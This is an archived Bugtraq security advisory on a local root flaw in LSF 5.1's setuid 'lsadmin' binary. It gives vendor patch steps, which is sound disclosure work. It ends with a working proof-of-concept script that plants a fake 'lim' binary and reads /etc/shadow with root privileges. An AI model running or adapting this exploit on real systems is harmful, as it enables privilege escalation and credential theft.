Home page logo
/

bugtraq logo Bugtraq mailing list archives

Security advisory: LSF 5.1 local root exploit
From: Tomasz Grabowski <cadence () apollo aci com pl>
Date: Thu, 22 May 2003 15:31:22 +0200 (CEST)


                     Security Advisory

                        22 May 2003

                   Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadence () aci com pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root priviledge by forcing the 'lsadmin'
        binary to execute code of attackers choice. The 'lsadmin' binary
        is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check the
correctness of config files. Right after it starts, it is using the
external 'lim' binary . It is using the LSF_SERVERDIR variable in lsf.conf
file to obtain a path for 'lim' binary. Regular user can make his own
lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of default /etc/lsf.conf file. Attacker can therefore point
the LSF_SERVERDIR variable to his own 'lim' binary.  The attackers 'lim'
binary will be executed with setuid root priviledges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact
support () platform com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
support () platform com



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence () man szczecin pl



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault